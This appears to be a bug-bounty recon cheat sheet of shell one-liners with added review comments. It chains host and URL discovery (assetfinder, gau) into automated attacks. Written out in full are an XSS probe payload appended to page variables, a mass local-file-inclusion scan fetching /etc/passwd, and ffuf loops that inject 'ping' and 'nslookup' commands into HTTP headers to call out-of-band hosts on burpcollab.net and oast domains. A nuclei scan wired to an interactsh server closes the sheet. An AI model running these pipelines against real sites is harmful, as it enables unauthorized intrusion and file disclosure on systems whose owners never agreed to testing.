# Pipeline: enumerate hosts for the target (assetfinder), collect archived URLs for
# them and their subdomains (gau --subs), drop stylesheet/SVG URLs, then for each URL
# fetch the page, turn every "var <name>" token in the response into a
# "<url>?<name>" string with a fixed probe suffix appended, and print the URL in
# yellow followed by the generated strings in green (no colour reset is emitted).
# NOTE(review): "exmple.com" looks like a typo for the intended target — verify.
# NOTE(review): $url is unquoted (word-splitting/globbing on unusual URLs), `read`
# lacks -r (backslashes are mangled) and curl has no --max-time, so one slow host
# stalls the whole loop.
# NOTE(review): the URL is interpolated into the sed replacement, so a URL
# containing "," (the s-command delimiter) or "&" (sed's matched-text token, common
# in query strings) breaks or corrupts the substitution.
# NOTE(review): '(.css|.svg)' and '.js' use an unescaped '.', which matches any
# character, so unrelated URLs are dropped too; egrep is deprecated — use grep -E.
# NOTE(review): the trailing "| |" looks like a rendering artifact of the gist
# table rather than part of the command — confirm against the raw gist.
assetfinder https://exmple.com | gau --subs | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=1"><svg onload=alert(1)>/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars";done | |
# Pipeline: enumerate hosts, collect archived URLs, keep those whose parameters
# look like file-inclusion candidates (gf lfi), substitute a fixed path into the
# parameter (`place` is not a standard tool — presumably a local helper; confirm),
# then fetch up to 25 URLs in parallel and report any response body (stderr is
# merged in via 2>&1) that contains "root:x".
# NOTE(review): each URL is spliced textually into the `sh -c '...'` string through
# xargs -I%, so a URL containing a quote, `$(`, a backtick or `;` is executed as
# shell on the operator's machine. Every URL from gau is untrusted input; pass it
# as a positional argument (`sh -c '... "$1" ...' _ %`) instead of interpolating.
# NOTE(review): curl has no --max-time, so a non-responsive host occupies one of
# the 25 slots indefinitely.
# NOTE(review): the trailing "| |" looks like a rendering artifact, not code.
assetfinder https://exmple.com | gau --subs https://exmple.com | gf lfi | place "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"' | |
# Pipeline: read previously collected candidate URLs from output/domains.txt, keep
# the gf "lfi" matches, mark the parameter value with FUZZ, then run ffuf per URL
# with ~/wordlist.txt, keeping responses that contain "root:x" (-mr) with status
# 200/403 (-mc), filtering 405 (-fc) and enabling auto-calibration (-ac). The
# Host/Referer/X-Forwarded-Host values are probe strings that produce a DNS/ICMP
# callback to an out-of-band listener if the server resolves or shell-expands
# header values.
# NOTE(review): the "*.burpcollab.net" and "*.oast.online" names are single-session
# callback hostnames; hard-coded here they are stale, and any callback they still
# trigger reaches whoever currently holds that name, not the operator.
# NOTE(review): ffuf's -ac is a boolean switch; the extra literal "true" is
# presumably taken as a stray positional argument — confirm with `ffuf -h`.
# NOTE(review): $url is unquoted and `read` lacks -r; `$(hostname)` embeds the
# operator's machine name in every outbound request.
# NOTE(review): the trailing "| |" looks like a rendering artifact, not code.
gf lfi output/domains.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H "Host: $(hostname).burpcollab.net" -H "Referer: 8.8.8.8;ping -c 3 $(hostname).burpcollab.net" -H "X-Forwarded-Host: 8.8.8.8;nslookup+callesvmkd63gvfclgjg63ktieresg7dt.oast.online" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/101.0.4951.64 Safari/537.36" -w ~/wordlist.txt -fc 405 -mc 200,403 -ac true; done | |
### DNS rebinding for RCE | |
# Same shape as the previous ffuf loop, but over every file under output/ and with
# the SecLists LFI path wordlist; here the Host header itself is an out-of-band
# hostname and X-Forwarded-Host / referer carry the callback probes.
# NOTE(review): the heading says "DNS rebinding", but the command performs
# out-of-band DNS/ICMP callback probing through injected header values, not
# rebinding — confirm the intended label.
# NOTE(review): the User-Agent value contains a literal newline after "(KHTML,",
# which is why the command spans two lines; a raw newline inside a header value is
# most likely a paste error and may be rejected or sent malformed by ffuf — confirm.
# NOTE(review): the three "*.oast.pro" names are single-session interactsh
# hostnames; hard-coded they are stale and any callback goes to a third party.
# NOTE(review): the "| |" ending each line (including the heading) looks like a
# rendering artifact of the gist table, not part of the command.
gf lfi output/*.txt | place FUZZ | while read url ; do ffuf -u $url -mr "root:x" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, | |
like Gecko) Chrome/101.0.4951.64 Safari/537.36" -H "Host: cali877mkd6a35j9596ghmbkiscuwm4ue.oast.pro" -H "X-Forwarded-Host: 8.8.8.8;ping -c 3 cali877mkd6a35j9596gns3bij5s5n65y.oast.pro" -H "referer: 8.8.8.8;nslookup $(hostname).cali877mkd6a35j9596g3a5t3jjw1hoh4.oast.pro" -w /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt -fc 405 -mc 200,403 -ac true; done | |
# Pipeline: enumerate subdomains only (-subs-only), probe the listed ports with
# httpx (-silent, -nc = no colour output), then scan the live endpoints with nuclei
# using the template directory under /home/0x/.local, following redirects and
# using an interactsh server (-iserver) for templates that need an out-of-band
# callback; -interactions-eviction (presumably seconds) and
# -interactions-poll-duration control how long interactions are retained and how
# often they are polled.
# NOTE(review): both the template path and the "*.oast.live" interactsh host are
# machine- and session-specific; a stale -iserver name sends every out-of-band
# interaction to a third party, so this line is not reusable as written.
# NOTE(review): "exmple.com" looks like a typo for the intended target — verify.
# NOTE(review): the trailing "| |" looks like a rendering artifact, not code.
assetfinder https://exmple.com -subs-only | httpx -silent -p 80,443,8080,8443,9000,9001,9002,9003 -nc | nuclei -t /home/0x/.local/nuclei-templates -interactions-eviction 60 -interactions-poll-duration 5 -iserver cakrmf7mkd652id2opmgfp8oeewx1e3s7.oast.live -follow-redirects | |